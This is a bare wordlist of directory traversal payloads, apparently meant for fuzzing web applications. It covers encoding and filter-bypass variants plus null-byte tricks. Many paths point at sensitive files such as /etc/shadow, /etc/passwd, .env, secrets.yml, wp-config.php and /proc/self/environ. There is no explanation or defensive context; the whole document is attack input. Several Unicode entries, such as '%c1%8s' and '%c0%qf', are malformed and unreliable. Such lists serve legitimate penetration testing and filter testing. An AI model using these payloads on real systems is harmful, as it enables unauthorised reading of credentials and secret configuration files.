# Basic Directory Traversal
../
..\\
....//
....\\\\
.../
....\/
..../
.....//
......//
.......//
........//
.........//
..........//

# URL Encoded Traversal
%2e%2e%2f
%2e%2e/
%2e%2e\
..%2f
..%5c
%252e%252e%252f
..%252f
%252e%252e/
%252e%252e\
%2e%2e%255c
%252e%252e%255c

# Double URL Encoded
%252e%252e%252f
%252e%252e%255c
%25252e%25252e%25252f
%25252e%25252e%25255c

# Unicode Encoded
%c0%ae%c0%ae/
%c0%ae%c0%ae\
%c1%9c
%c0%af
..%c0%af
..%c1%9c
%c0%ae%c0%ae%c0%af
%c1%8s%c1%9c%c1%9c
%c1%pc%c1%pc
%c0%9v%c0%9v
%c0%qf%c0%qf
%c1%8s%c1%8s
%c1%9c%c1%9c
%c1%pc%c1%pc
%c1%1c%c1%1c
%c0%2e%c0%2e/
%c0%2e%c0%2e\

# UTF-8 Encoded
..%ef%bc%8f
..%ef%bc%bc
%ef%bc%8e%ef%bc%8e/
%ef%bc%8e%ef%bc%8e\
%ef%bc%8e%ef%bc%8e%ef%bc%8f
%ef%bc%8e%ef%bc%8e%ef%bc%9c

# UTF-16 Encoded
%u002e%u002e/
%u002e%u002e\
..%u2215
..%u2216
%uff0e%uff0e/
%uff0e%uff0e\
%u002e%u002e%u2215
%u002e%u002e%u2216
%uff0e%uff0e%u2215
%uff0e%uff0e%u2216

# Overlong UTF-8
..%e0%80%af
..%f0%80%80%af
%e0%80%ae%e0%80%ae/
%e0%80%ae%e0%80%ae\
%f0%80%80%ae%f0%80%80%ae/
%f0%80%80%ae%f0%80%80%ae\

# 16-bit Unicode
%u002e%u002e%u002f
%u002e%u002e%u005c
%uFF0E%uFF0E%uFF0F
%uFF0E%uFF0E%uFF3C

# Mixed Encoding
%2e./
.%2e/
%2e.%2f
.%2e%2f
%2e%2e.
%2e.%5c
.%2e%5c
%2e%2e%5c

# Null Byte Injection
..%00/
%2e%2e%00/
..%00%2f
%2e%2e%00%2f

# Case Variations
..%2F
..%5C
%2E%2E%2F
%2E%2E%5C

# Alternative Separators
..;
..|
..*
..?
..&
..=
..+
..-
.._
..~
..!
..@
..#
..$
..%
..^

# Windows Specific
..\\
..\\.\
.\../
.\..\
..\..\..\etc\passwd
..\..\..\windows\system32\drivers\etc\hosts

# Linux/Unix Specific
../../../etc/passwd
../../../etc/shadow
../../../etc/hosts
../../../proc/version
../../../proc/self/environ
../../../var/log/apache2/access.log
../../../var/log/apache2/error.log

# Web Server Specific
../../../apache/logs/access.log
../../../apache/logs/error.log
../../../nginx/logs/access.log
../../../nginx/logs/error.log
../../../iis/logs/

# Application Specific
../../../config/database.yml
../../../config/secrets.yml
../../../.env
../../../wp-config.php
../../../application/config/database.php

# Bypass Filters
..;/
..//
../;/
..;//
..;/../
..;/..;//
..%00/
..%0a/
..%0d/
..%09/
..%20/

# Java Specific
..\\WEB-INF\\web.xml
..\\META-INF\\MANIFEST.MF
../WEB-INF/web.xml
../META-INF/MANIFEST.MF

# ASP.NET Specific
..\\web.config
..\\global.asax
../web.config
../global.asax

# PHP Specific
../../../etc/passwd%00
../../../etc/passwd%00.jpg
../../../etc/passwd\x00
../../../etc/passwd\x00.png